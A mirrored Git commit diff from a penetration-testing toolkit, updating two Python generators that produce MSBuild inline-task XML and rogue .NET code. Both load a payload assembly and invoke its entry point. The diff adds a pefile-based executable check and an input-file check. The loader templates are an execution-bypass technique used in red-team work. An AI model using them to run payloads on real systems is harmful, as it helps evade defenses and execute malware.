mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-18 15:15:05 +01:00
Updated generateMSBuildXML.py and generateRogueDotNet.py
This commit is contained in:
parent
620b80d2d3
commit
01e2fa3643
@ -22,6 +22,7 @@ import sys
|
||||
import gzip
|
||||
import base64
|
||||
import string
|
||||
import pefile
|
||||
import struct
|
||||
import random
|
||||
import binascii
|
||||
@ -83,10 +84,16 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
||||
<Reference Include="System.Management.Automation" />
|
||||
<Code Type="Class" Language="cs">
|
||||
<![CDATA[
|
||||
using System.Management.Automation;
|
||||
using System.Management.Automation.Runspaces;
|
||||
using Microsoft.Build.Framework;
|
||||
using Microsoft.Build.Utilities;
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.IO;
|
||||
using System.IO.Compression;
|
||||
using System;
|
||||
using System.Reflection;
|
||||
using System.Text;
|
||||
|
||||
public class $templateName : Task {
|
||||
@ -113,14 +120,15 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
||||
Assembly asm = Assembly.Load(payload);
|
||||
MethodInfo method = asm.EntryPoint;
|
||||
object instance = asm.CreateInstance(method.Name);
|
||||
method.Invoke(instance, null);
|
||||
method.Invoke(instance, new object[] { new string[] { } });
|
||||
return true;
|
||||
}
|
||||
}
|
||||
]]>
|
||||
</Code>
|
||||
</Task>''').safe_substitute(
|
||||
payloadCode = payloadCode
|
||||
payloadCode = payloadCode,
|
||||
templateName = templateName
|
||||
)
|
||||
|
||||
launchCode = exeLaunchCode
|
||||
@ -143,7 +151,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
||||
using System.Runtime.InteropServices;
|
||||
using System.IO;
|
||||
using System.IO.Compression;
|
||||
using System.Text;
|
||||
using System.Text;
|
||||
|
||||
public class $templateName : Task {
|
||||
|
||||
@ -489,26 +497,12 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
||||
return template
|
||||
|
||||
def detectFileIsExe(filePath, forced = False):
|
||||
first1000 = []
|
||||
|
||||
with open(filePath, 'rb') as f:
|
||||
first1000 = f.read()[:1000]
|
||||
|
||||
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||
try:
|
||||
pe = pefile.PE(filePath)
|
||||
return True
|
||||
except pefile.PEFormatError as e:
|
||||
return False
|
||||
|
||||
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||
|
||||
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||
return False
|
||||
|
||||
dosStub = "This program cannot be run in DOS mode."
|
||||
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||
|
||||
#if not dosStub in printables:
|
||||
# return False
|
||||
return True
|
||||
|
||||
def minimize(output):
|
||||
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
|
||||
output = output.replace('\n', '')
|
||||
@ -601,6 +595,10 @@ def main(argv):
|
||||
|
||||
_format = 'powershell'
|
||||
|
||||
if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
|
||||
sys.stderr.write('[?] Input file does not exists.\n\n')
|
||||
return False
|
||||
|
||||
if args.exe:
|
||||
if not detectFileIsExe(args.inputFile, args.exe):
|
||||
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
|
||||
|
@ -47,6 +47,7 @@ import string
|
||||
import struct
|
||||
import random
|
||||
import binascii
|
||||
import pefile
|
||||
import argparse
|
||||
import tempfile
|
||||
import subprocess
|
||||
@ -236,8 +237,8 @@ def getSourceFileContents(
|
||||
Assembly asm = Assembly.Load(payload);
|
||||
MethodInfo method = asm.EntryPoint;
|
||||
object instance = asm.CreateInstance(method.Name);
|
||||
method.Invoke(instance, null);
|
||||
|
||||
method.Invoke(instance, new object[] { new string[] { } });
|
||||
return true;
|
||||
}
|
||||
|
||||
''').safe_substitute(
|
||||
@ -662,26 +663,12 @@ $namespaceStop
|
||||
return template, templateName
|
||||
|
||||
def detectFileIsExe(filePath, forced = False):
|
||||
first1000 = []
|
||||
|
||||
with open(filePath, 'rb') as f:
|
||||
first1000 = f.read()[:1000]
|
||||
|
||||
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||
try:
|
||||
pe = pefile.PE(filePath)
|
||||
return True
|
||||
except pefile.PEFormatError as e:
|
||||
return False
|
||||
|
||||
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||
|
||||
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||
return False
|
||||
|
||||
dosStub = "This program cannot be run in DOS mode."
|
||||
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||
|
||||
#if not dosStub in printables:
|
||||
# return False
|
||||
return True
|
||||
|
||||
|
||||
def opts(argv):
|
||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile|cmdline>')
|
||||
@ -727,6 +714,10 @@ def main(argv):
|
||||
|
||||
_format = 'powershell'
|
||||
|
||||
if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
|
||||
sys.stderr.write('[?] Input file does not exists.\n\n')
|
||||
return False
|
||||
|
||||
if args.type not in ['exec', 'run-command']:
|
||||
if args.exe:
|
||||
if not detectFileIsExe(args.inputFile, args.exe):
|
||||
|
Loading…
Reference in New Issue
Block a user